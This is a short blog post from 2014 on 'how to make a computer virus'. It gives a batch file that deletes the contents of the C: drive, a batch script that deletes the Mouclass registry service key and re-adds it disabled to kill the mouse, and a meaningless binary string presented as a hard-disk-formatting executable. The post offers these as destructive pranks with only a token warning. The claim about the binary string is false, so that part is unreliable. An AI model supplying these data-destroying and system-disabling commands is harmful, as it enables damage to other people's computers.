How to Make a Effective Computer Virus









Creating Virus is Very easy just like eating a ice cream. Even a kid can do it.Well not that easy. you need to have have knowledge in assembly languages .But if you're interested in making executable viruses, C or C++ is a good place to start. Today we gonna see very simple but powerful virus programing .

>>>Virus that format C: Drive:
 1. Open Notepad and copy below code into it.
 
    "    @Echo off
           Del C:\ *.* |y  "

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.

>>>Virus that Disable Mouse:

  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as  virus.bat
  • Done you just created your virus.

>>>Virus that create binary virus to format HARDDIsK:

   1. Copy the below codes into Notepad.

01001011000111110010010101010101010000011111100000
   2. Save the file as Format.exe
    
     ENJOY 


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive.We will not be responsible for any damage done to your computer.

Artikel Menarik Lainnya :

Ditulis oleh Unknown - Jumat, 07 November 2014 - 01.46

Belum ada komentar untuk "How to Make a Effective Computer Virus "

Posting Komentar